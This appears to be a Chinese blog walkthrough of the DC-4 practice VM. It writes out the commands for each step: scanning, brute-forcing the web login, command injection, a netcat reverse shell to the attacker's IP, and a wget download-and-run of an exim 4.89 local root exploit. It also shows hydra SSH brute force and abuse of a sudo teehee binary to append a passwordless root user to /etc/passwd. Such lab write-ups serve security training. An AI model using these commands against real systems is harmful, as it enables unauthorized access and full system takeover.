arp-scan找靶机IP
端口扫描
nmap扫描
dirb目录扫描
http://192.168.253.133/
whatweb扫描
burp爆破
用户名用默认admin
这里happy长度明显不同,尝试
进入后台
选择第一个
抓包发现这里是直接可以解析的
将命令改成自己想要输入的
反弹shell
nc 192.168.253.129 9999-e /bin/bash
只做到这里,后面shell反弹死都获取不到
可以看到kali中获得了shell
使用python获得交互式界面
python -c “import pty;pty.spawn(‘/bin/bash’)”
提权
不知道是这题的问题还是什么问题因为我以前做过DC-8,所以DC-4发现了2个提权点。
一个就是DC-8里面用到的exim4提权
另一个是
exim4提权
先看看当前权限
不是root权限
都先看看具有SUID权限的命令
find / -user root -perm -4000 -print 2>/dev/null
发现一个exim4
查看查看exim4版本
exim4 --version #查看exim4的版本
我的天哪!又是4.89 和DC-8的一样 又是和DC-8一样的套路
先看看本地漏洞库
searchsploit exim 4
46996符合exim 4.89 就用这个 拷贝到kali的apache web页面下
systemctl start apache2.service #开启apache
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html #拷贝到kali的apache web页面下
访问kali web页面 复制payload下载地址
http://192.168.79.128/46996.sh
DC-4下载payload
wget http://192.168.79.128/46996.sh
显示拒绝访问,看来是这个目录权限不够,我们移到/tmp里面
cd /tmp
wget http://192.168.79.128/46996.sh
下载成功,给执行权限,并且运行。
chmod +x 46996.sh
./46996.sh
成功获得root权限
teehee提权
一样通过nc进入靶机,查看系统里面有什么文件
慢慢查找发现有一个文件jim可以直接进去 然后里面有一些奇怪的文件 一个一个慢慢看
发现了一大堆密码类似的东西,应该是给我们的提示 让我们爆破jim
把文件保存下来,爆破我们使用hydra
hydra -l jim -P mmmm.txt 192.168.79.132 ssh
可以得到ssh账号密码为:jim jibril04
使用kali登录jim
ssh jim@192.168.253.133
接下来还是一顿搜索 发现jim有邮件
进入邮件目录
cd var/spool/mail
可以看到发件人的账号和密码
账号:Charles
密码:^xHhA&hvim0y
直接su 切换用户试试
su Charles #发现不行 然后试了一下小写就没问题
账号:charles
密码:^xHhA&hvim0y
su charles # 然后输入密码即可
查看 使用sudo运行的命令
sudo -l
发现了个root权限的命令teehee(小型文本编辑器),可以利用这个命令进行提权
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd #建议手打命令,复制粘贴可能不管用
建议手打命令,复制粘贴可能不管用
可参考/etc/passwd文件解刨
简而言之,就是存放用户的文件,可以通过修改该文件达到添加用户的效果,文件格式为
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限
利用管道符配合teehee命令,在passwd文件里写入一个不用密码root权限的用户test
FLAG
在root目录下
cd /root
cat flag.txt
用户标识号:组标识号:用户名:用户主目录:命令解析程序
口令为x即代表存放有密码,为空即代表没有密码,识标号为0代表root权限
利用管道符配合teehee命令,在passwd文件里写入一个不用密码root权限的用户test
FLAG
在root目录下
cd /root
cat flag.txt
扫一扫
227
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
